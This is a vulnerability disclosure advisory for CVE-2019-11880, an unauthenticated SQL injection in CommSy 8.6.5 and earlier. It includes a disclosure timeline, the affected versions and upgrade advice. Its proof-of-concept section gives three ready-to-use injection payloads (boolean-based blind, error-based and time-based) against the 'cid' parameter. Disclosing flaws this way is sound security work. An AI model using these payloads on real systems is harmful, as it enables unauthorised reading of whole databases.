CommSy 8.6.5 SQL Injection

`Title:  
======  
CommSy 8.6.5 - SQL injection  
  
Researcher:  
===========  
Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG  
  
CVE-ID:  
=======  
CVE-2019-11880  
  
Timeline:  
=========  
2019-04-15 Vulnerability discovered  
2019-04-15 Asked for security contact and PGP key  
2019-04-16 Send details to the vendor  
2019-05-07 Flaw was approved but will not be fixed in branch 8.6  
2019-05-15 Public disclosure  
  
Affected Products:  
==================  
CommSy <= 8.6.5  
  
Vendor Homepage:  
================  
https://www.commsy.net  
  
Details:  
========  
CommSy is a web-based community system, originally developed at the  
University of Hamburg, Germany, to support learning/working communities.  
We have discovered a unauthenticated SQL injection vulnerability in  
CommSy <= 8.6.5 that makes it possible to read all database content. The  
vulnerability exists in the HTTP GET parameter "cid".  
  
Proof of Concept:  
=================  
boolean-based blind:  
commsy.php?cid=101" AND 3823=(SELECT (CASE WHEN (3823=3823) THEN 3823  
ELSE (SELECT 7548 UNION SELECT 4498) END))-- dGRD&mod=context&fct=login  
  
error-based:  
commsy.php?cid=101" AND (SELECT 6105 FROM(SELECT  
COUNT(*),CONCAT(0x716a767871,(SELECT  
(ELT(6105=6105,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jzQs&mod=context&fct=login  
  
time-based blind:  
commsy.php?cid=101" AND SLEEP(5)-- MjJM&mod=context&fct=login  
  
Fix:  
====  
According to the manufacturer, the version branch 8.6 is no longer  
supported and the vulnerability will not be fixed. Customers should  
update to the newest version 9.2.  
`